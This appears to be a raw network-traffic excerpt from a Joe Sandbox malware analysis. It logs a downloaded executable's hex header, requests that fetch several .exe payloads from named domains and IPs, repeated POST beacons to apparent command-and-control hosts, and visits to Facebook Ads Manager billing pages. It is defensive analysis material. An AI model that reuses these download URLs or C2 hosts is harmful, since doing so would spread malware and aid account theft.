                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: application/octet-streamContent-Length: 6174208Last-Modified: Thu, 13 Oct 2022 11:00:44 GMTConnection: keep-aliveETag: "6347efdc-5e3600"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 90 09 00 00 a2 54 00 00 00 00 00 74 9e 09 00 00 10 00 00 00 a0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 5e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 cc 24 00 00 00 d0 0a 00 00 b0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 bc ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 d4 8e 09 00 00 10 00 00 00 90 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 18 00 00 00 a0 09 00 00 1a 00 00 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 c9 0c 00 00 00 c0 09 00 00 00 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 cc 24 00 00 00 d0 09 00 00 26 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0a 00 00 00 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0a 00 00 02 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc ae 00 00 00 20 0a 00 00 b0 00 00 00 d6 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 b0 53 00 00 d0 0a 00 00 b0 53 00 00 86 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5e 00 00 00 00 00 00 36 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /files/pe/pb1113.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kkh.eiwagggg.com
                  Source: global trafficHTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
                  Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /22.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.rukangiralawchambers.org
                  Source: global trafficHTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                  Source: global trafficHTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
                  Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
                  Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erlmaqaee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbcgxocfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbaff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjfwyiswqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uywhkxoed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://osqxrahfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqesn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmbcjpnhmn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfnfj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: GET /intersock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 179.43.163.115
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikrffkiyo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cluvur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogumtw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://penvasmsfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yupxpeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elepmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://musgiffp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mosxiihyx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erwwlrd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rplmdlqvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: furubujjul.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxbnplb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttkphlkd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acwsosy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhnjmhndyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mumrxhscl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbclkddt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwduafudxk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oluukivxak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urtpdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcouemgwhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iveusnelmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feguaryku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xaxubvgaxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgtoajitw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qatdmt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://taycucfic.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yflhmtrc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqpwbiet.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecyhmxgsfc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnbmwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouoadwsue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://meodpejlxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otrdotvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thytbewb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgrdihsvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nubtbm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsfbujs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohjxgaebo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqngiychus.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmxbixt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrmxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymvtebx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxbykepfr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: avtlsgosecure.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkuitvuub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: avtlsgosecure.com
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewIP Address: 172.67.203.213 172.67.203.213
                  Source: Joe Sandbox ViewIP Address: 172.67.203.213 172.67.203.213
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/
